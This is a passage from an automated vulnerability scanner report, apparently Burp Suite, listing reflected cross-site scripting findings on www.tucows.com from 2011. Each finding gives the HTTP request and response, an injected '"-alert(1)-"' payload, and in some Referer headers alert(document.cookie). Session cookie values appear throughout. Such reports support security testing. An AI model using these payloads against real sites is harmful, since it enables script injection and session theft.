HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:55 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82496"-alert(1)-"c8a91aceec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets82496"-alert(1)-"c8a91aceec7/sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:13 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caf6a"-alert(1)-"44f43ba9b50 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/sitemap.htmlcaf6a"-alert(1)-"44f43ba9b50 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.335. http://www.tucows.com/images/newassets/sitemap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 220eb"-alert(1)-"e4076721429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/sitemap.html?220eb"-alert(1)-"e4076721429=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:30 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33aa5"-alert(1)-"59cc111f4af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images33aa5"-alert(1)-"59cc111f4af/newassets/terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:06 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b47ad"-alert(1)-"799fe703e28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsb47ad"-alert(1)-"799fe703e28/terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:18 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 102d4"-alert(1)-"f3c9b91e18e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/terms.html102d4"-alert(1)-"f3c9b91e18e HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.339. http://www.tucows.com/images/newassets/terms.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/terms.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eabf"-alert(1)-"20d1d0ffbba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/terms.html?5eabf"-alert(1)-"20d1d0ffbba=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:38 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae2fb"-alert(1)-"6d8934a62dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesae2fb"-alert(1)-"6d8934a62dd/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31900
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f85d"-alert(1)-"109c256849a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar3f85d"-alert(1)-"109c256849a/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b6fb"-alert(1)-"fc67c6d109f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.01b6fb"-alert(1)-"fc67c6d109f/css/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:56 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45e8b"-alert(1)-"4bed83e5cce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.0/css45e8b"-alert(1)-"4bed83e5cce/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 33078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1a29"-alert(1)-"d118442f3f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.0/css/style.csse1a29"-alert(1)-"d118442f3f9 HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
